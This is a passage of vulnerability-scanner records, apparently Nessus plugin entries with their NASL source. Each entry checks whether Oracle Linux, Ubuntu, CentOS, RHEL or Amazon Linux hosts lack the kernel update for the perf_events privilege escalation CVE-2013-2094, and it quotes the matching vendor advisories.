reference:\"kernel-firmware-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:58", "description": "From Red Hat Security Advisory 2013:0830 :\n\nUpdated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. 
The system must be rebooted\nfor this update to take effect.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : kernel (ELSA-2013-0830)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2013-0830.NASL", "href": "https://www.tenable.com/plugins/nessus/68823", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0830 and \n# Oracle Linux Security Advisory ELSA-2013-0830 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68823);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"RHSA\", value:\"2013:0830\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2013-0830)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0830 :\n\nUpdated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. 
The system must be rebooted\nfor this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-May/003476.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2013-0830\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-doc-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-firmware-2.6.32\") && rpm_check(release:\"EL6\", 
reference:\"kernel-firmware-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:37", "description": "An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2013-05-16T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-1828-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1828-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66471", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1828-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66471);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"USN\", value:\"1828-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-1828-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1828-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.5-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1828-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.5.0-30-generic\", pkgver:\"3.5.0-30.51~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:28:45", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. 
A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.", "edition": 26, "published": "2013-05-21T00:00:00", "title": "CentOS 6 : kernel (CESA-2013:0830)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-21T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-firmware", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2013-0830.NASL", "href": "https://www.tenable.com/plugins/nessus/66521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0830 and \n# CentOS Errata and Security Advisory 2013:0830 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66521);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"RHSA\", value:\"2013:0830\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2013:0830)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", 
\n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a\nuser-supplied index into the perf_swevent_enabled array not being\nvalidated properly, resulting in out-of-bounds kernel memory access. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the\nReferences, for further information and mitigation instructions for\nusers who are unable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. 
The system must be rebooted\nfor this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-May/019733.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?001479ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2094\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-devel / kernel-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:18:28", "description": "A flaw was found in the way index into perf_swevent_enabled array was\nsanitized. 
A local, unprivileged user could leverage this flaw to gain\nelevated privileges on the system.", "edition": 23, "published": "2014-03-20T00:00:00", "title": "Amazon Linux AMI : kernel Privilege Escalation (ALAS-2013-190)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2013-190.NASL", "href": "https://www.tenable.com/plugins/nessus/73126", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2013-190.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73126);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_bugtraq_id(59846);\n script_xref(name:\"ALAS\", value:\"2013-190\");\n script_xref(name:\"CERT\", value:\"774103\");\n 